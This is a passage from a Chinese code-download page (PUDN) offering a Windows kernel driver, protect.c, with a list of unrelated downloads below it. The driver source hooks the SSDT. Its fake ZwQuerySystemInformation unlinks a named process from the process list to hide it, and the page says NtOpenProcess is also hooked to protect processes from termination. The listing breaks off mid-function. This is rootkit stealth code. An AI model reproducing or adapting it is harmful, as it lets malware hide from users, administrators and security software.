• PUDN用户
    了解作者
  • Visual C++
    开发工具
  • 6KB
    文件大小
  • zip
    文件格式
  • 0
    收藏次数
  • 1 积分
    下载积分
  • 13
    下载次数
  • 2013-03-07 23:11
    上传日期
Fake_NtQuerySystemInfo 断链进程隐藏,Fake_NtOpenProcess 保护进程,Fake_NtCreateSection进程创建等,SSDT hook
WDK_protect.zip
  • protect.c
    23.4KB
内容介绍
#include "ntddk.h" #include "ldasm.h" const WCHAR DeviceName[]=L"\\Device\\protect"; const WCHAR DeviceLink[]=L"\\DosDevices\\protect"; #pragma pack(1) typedef struct _KSERVICE_TABLE_DESCRIPTOR { PULONG_PTR Base; PULONG Count; ULONG Limit; #if defined(_IA64_) LONG TableBaseGpOffset; #endif PUCHAR Number; } KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR; #pragma pack() KSERVICE_TABLE_DESCRIPTOR NTSYSAPI KeServiceDescriptorTable; PMDL MDLSystemCall; PULONG MappedSystemCallTable; LARGE_INTEGER m_UserTime; LARGE_INTEGER m_KernelTime; PCHAR output; PCHAR protect; LONG pid; KEVENT event; #define IOCTL_PROCESS_INFORMATION_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1000, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_PROCESS_NUMBER_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1001, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_HOOKAPI_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1002, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_UNHOOKAPI_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1003, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_HOOKAPI_CONTROL1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1004, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_UNHOOKAPI_CONTROL1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1005, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_HOOKAPI_CONTROL2 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1006, METHOD_BUFFERED, FILE_ANY_ACCESS) #define IOCTL_UNHOOKAPI_CONTROL2 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1007, METHOD_BUFFERED, FILE_ANY_ACCESS) #define SYSTEMSERVICE(_function) KeServiceDescriptorTable.Base[ *(PULONG)((PUCHAR)_function+1) ] #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1) #define HOOK_SYSCALL(_Index, _Hook, _Orig ) \ _Orig = InterlockedExchange( (PLONG) &MappedSystemCallTable[_Index], (LONG) _Hook) #define UNHOOK_SYSCALL(_Index, _Hook, _Orig ) \ InterlockedExchange( (PLONG) &MappedSystemCallTable[_Index], (LONG) _Hook) typedef struct _SYSTEM_THREAD { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; LONG BasePriority; ULONG ContextSwitchCount; ULONG State; KWAIT_REASON WaitReason; } SYSTEM_THREAD, *PSYSTEM_THREAD; typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset; ULONG NumberOfThreads; LARGE_INTEGER Reserved[3]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ImageName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; ULONG PrivatePageCount; VM_COUNTERS VirtualMemoryCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD Threads[0]; } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; typedef struct _SYSTEM_PROCESSOR_TIMES { LARGE_INTEGER IdleTime; LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER DpcTime; LARGE_INTEGER InterruptTime; ULONG InterruptCount; } SYSTEM_PROCESSOR_TIMES, *PSYSTEM_PROCESSOR_TIMES; typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemCpuInformation = 1, SystemPerformanceInformation = 2, SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */ Unknown4, SystemProcessInformation = 5, Unknown6, Unknown7, SystemProcessorPerformanceInformation = 8, Unknown9, Unknown10, SystemModuleInformation = 11, Unknown12, Unknown13, Unknown14, Unknown15, SystemHandleInformation = 16, Unknown17, SystemPageFileInformation = 18, Unknown19, Unknown20, SystemCacheInformation = 21, Unknown22, SystemInterruptInformation = 23, SystemDpcBehaviourInformation = 24, SystemFullMemoryInformation = 25, SystemNotImplemented6 = 25, SystemLoadImage = 26, SystemUnloadImage = 27, SystemTimeAdjustmentInformation = 28, SystemTimeAdjustment = 28, SystemSummaryMemoryInformation = 29, SystemNotImplemented7 = 29, SystemNextEventIdInformation = 30, SystemNotImplemented8 = 30, SystemEventIdsInformation = 31, SystemCrashDumpInformation = 32, SystemExceptionInformation = 33, SystemCrashDumpStateInformation = 34, SystemKernelDebuggerInformation = 35, SystemContextSwitchInformation = 36, SystemRegistryQuotaInformation = 37, SystemCurrentTimeZoneInformation = 44, SystemTimeZoneInformation = 44, SystemLookasideInformation = 45, SystemSetTimeSlipEvent = 46, SystemCreateSession = 47, SystemDeleteSession = 48, SystemInvalidInfoClass4 = 49, SystemRangeStartInformation = 50, SystemVerifierInformation = 51, SystemAddVerifier = 52, SystemSessionProcessesInformation = 53, SystemInformationClassMax } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN SIZE_T Length, OUT PSIZE_T ResultLength ); typedef NTSTATUS (NTAPI *ZWCREATESECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL); typedef NTSTATUS (NTAPI *ZWOPENPROCESS)( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL ); NTSTATUS NTAPI ZwQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN SIZE_T Length, OUT PSIZE_T ResultLength); ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation; ZWCREATESECTION OldZwCreateSection; ZWOPENPROCESS OldZwOpenProcess; NTSTATUS NTAPI Fake_ZwQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN SIZE_T Length, OUT PSIZE_T ResultLength ) { NTSTATUS Status; UNICODE_STRING process_name; RtlInitUnicodeString(&process_name, L"TestSys.exe"); Status = OldZwQuerySystemInformation( SystemInformationClass, SystemInformation, Length, ResultLength ); if(NT_SUCCESS(Status)) { if(SystemInformationClass == SystemProcessInformation) { struct _SYSTEM_PROCESS_INFORMATION *curr = (struct _SYSTEM_PROCESS_INFORMATION *)SystemInformation; struct _SYSTEM_PROCESS_INFORMATION *prev = NULL; if(curr->NextEntryOffset) ((char *)curr += curr->NextEntryOffset); while(curr) { if (curr->ImageName.Buffer != NULL) { if (RtlEqualUnicodeString(&process_name, &curr->ImageName, TRUE)) { m_UserTime.QuadPart += curr->UserTime.QuadPart; m_KernelTime.QuadPart += curr->KernelTime.QuadPart; if(prev) // Middle or Last entry { if(curr->NextEntryOffset) prev->NextEntryOffset += curr->NextEntryOffset; else // we are last, so make prev the end prev->NextEntryOffset = 0; } else { if(curr->NextEntryOffset) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryOffset; } else // we are the only process!
评论
    相关推荐
    • Process-prevent-killed:防止进程被杀死的某种方法
      防止死亡的过程 ring3右 将程序的流程修改为系统流程 原理和代码很简单,它可以防止Taskmgr杀死进程 仅在XP中有效。防止杀戮受限,不能保护冰剑 挂钩NtQuerySystemInformation 将NtQuerySystemInformation钩到隐藏...
    • appAuthHelper:适用于AppAuthJS的包装程序,可帮助进行无提示令牌的获取和续订
      App Auth JS助手 包装可协助完成整个OAuth2 / OIDC令牌的生命周期。 目的 AppAuth和此帮助程序的主要目标都是允许您的单页应用程序获取OAuth2访问令牌和OpenID Connect ID令牌。 AppAuth for JavaScript提供了一个...
    • counter hack reloaded
      process in more detail and providing the overall architecture of attacks. By covering each category of attack tool and the overall attack architecture in more detail, we can better understand the ...
    • drupal 6.12
      To completely hide all documentation files from public view, repeat this command for each of the Drupal documentation files in the installation directory, substituting the name of each file for ...
    • PhantOm.plugin.1.54
      ---[ PhantOm plugin 1.54 ]-------------------------------------------------- by Hellsp@wn & Archer & Olenevod. | Bronco, kioresk, RSI, ...[+] Windows hide. [+] GetProcessTimes. [+] NtSetContextThread.
    • Private Exe Protector Version 3.2.2 (demo)
      o Add special feature [Hide file from Antivirus] - available ONLY in special license and version (to get it you may contact with support) * Update/Fix: o Update of loader (bug names #missed librarys) ...
    • PhantOm V1.25 修正
      ] Protect DRx. [!] Hide DRx. [!] Fake Windows version. [!] Custom Handler. [+] BlockInput What’s New - 1.25 You may now ask the very name services HIDENAME and RDTSCNAME. Some minor bugs. Fixed ...
    • HyperWin:专为Windows操作系统设计的本机管理程序
      超级Win HyperWin是为运行在Intel处理器上的Windows(仅x64)设计的本机虚拟机管理程序。 整个系统包含三个主要组件:虚拟机管理程序,驱动... protect-file-data -p "C:\Users\Amir\Desktop\Sample.txt" -h "a" -e "u
    • Learning.ASP.NET.3.5.2nd.Edition.Jul.2008.rar
      Chapter 9, Security, shows you how you can protect your web site from malicious users. You’ll find out how to register your users and how to hide parts of your site from users who don’t have the ...
    • qpopper2.53.tar.Z
      pop3 server